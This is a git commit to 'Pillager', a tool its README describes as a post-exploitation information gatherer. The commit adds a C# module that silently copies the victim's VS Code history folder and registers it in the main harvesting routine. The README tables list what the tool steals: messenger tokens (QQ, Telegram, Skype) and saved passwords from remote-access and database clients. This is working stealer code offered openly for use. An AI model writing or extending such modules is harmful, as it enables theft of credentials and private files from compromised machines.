This commit is contained in:
簞純 2024-01-23 13:44:56 +08:00
parent e48e256e52
commit 9fa06c2aad
4 changed files with 43 additions and 13 deletions

View File

@ -86,6 +86,7 @@
<Compile Include="Tools\MobaXterm.cs" />
<Compile Include="Tools\Navicat.cs" />
<Compile Include="Tools\RDCMan.cs" />
<Compile Include="Tools\VSCode.cs" />
<Compile Include="Tools\Xmanager.cs" />
</ItemGroup>
<ItemGroup>

View File

@ -39,6 +39,7 @@ namespace Pillager
Navicat.Save(savepath);
RDCMan.Save(savepath);
FinalShell.Save(savepath);
VSCode.Save(savepath);
//Mail
MailMaster.Save(savepath);

27
Pillager/Tools/VSCode.cs Normal file
View File

@ -0,0 +1,27 @@
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
namespace Pillager.Tools
{
internal class VSCode
{
public static string ToolName = "VSCode";
public static void Save(string path)
{
try
{
string historypath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Code\\User\\History");
if (!Directory.Exists(historypath)) return;
string savepath = Path.Combine(path, ToolName);
Directory.CreateDirectory(savepath);
Methods.CopyDirectory(historypath, Path.Combine(savepath, "History"), true);
}
catch { }
}
}
}

View File

@ -42,20 +42,21 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持
| IM | Support |
| :------: | :---------------: |
| QQ | ClientKey(Mail) |
| Telegram | tdata |
| Skype | Token |
| Enigma | DeviceID/Datebase |
| IM | Support |
| :-----------------: | :---------------: |
| QQ(最新版本不可用)) | ClientKey(Mail) |
| Telegram | tdata |
| Skype | Token |
| Enigma | DeviceID/Datebase |
| Tool | Support |
| :--------: | :------: |
| MobaXterm | Password |
| Xmanager | Password |
| RDCMan | Password |
| FinalShell | Password |
| Navicat | Password |
| Tool | Support |
| :--------: | :-----------: |
| MobaXterm | Password |
| Xmanager | Password |
| RDCMan | Password |
| FinalShell | Password |
| Navicat | Password |
| VSCode | History Files |
| Mail | Support |
| :--------: | :------: |